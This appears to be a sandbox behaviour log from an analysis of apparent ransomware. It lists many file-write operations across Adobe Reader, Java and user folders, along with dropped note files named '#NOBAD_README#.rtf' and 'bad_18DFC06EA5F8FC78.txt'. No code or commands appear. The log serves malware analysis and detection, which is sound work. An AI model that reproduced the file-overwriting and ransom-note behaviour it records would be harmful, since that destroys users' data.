| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\redact_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\bad_18DFC06EA5F8FC78.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ph4FbxSYkvNgOdef0l1h\hZ7p_lTS0ptPK\wDCJM2at.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\javaw.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\policytool.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\accessibility.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\add_reviewer.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\eula.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\content-types.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ko-kr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_sv.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annots.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\new_icons_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_received.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sv-se\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\main.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Updater.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\cldrdata.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\bg_patterns_header.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ca-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_super.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\submission_history.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-fr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunpkcs11.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\LightTheme.acrotheme | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-ma\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ro-ro\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-high-contrast.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pt-br\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-144x144-precomposed.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\end_review.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons_retina_thumb.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_joined.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_ok.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\warning.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-win8.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon_hover_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_hiContrast_bow.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\large_trefoil.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaSansRegular.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon_hover.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_MoveDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\pt-br\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\jvm.hprof.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adobe_spinner_mini.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\dd_arrow_small.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\exportpdf-rna-selector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\selection-actions.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-144x144-precomposed.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons_retina_thumb.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ind_prog.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\psfont.properties.ja | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\security\local_policy.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\RHP_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\Welcome.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\plugin.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adobe_spinner_mini.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\dd_arrow_small.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\root\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\Genko_2.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Mail\tenant.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Certificates_R.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-ma\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner2x.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ro-ro\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_hover.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\da-dk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hu-hu\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-tw\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\EPDF_Full.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\combinepdf-selector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Scan_R_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\exportpdf-rna-tool-view.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\example_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_hover.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\da-dk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hu-hu\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-ae\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ru-ru\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ja-jp\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\createpdfupsell-app-selector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-si\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hr-hr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugin.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\js\plugin.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_hover_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
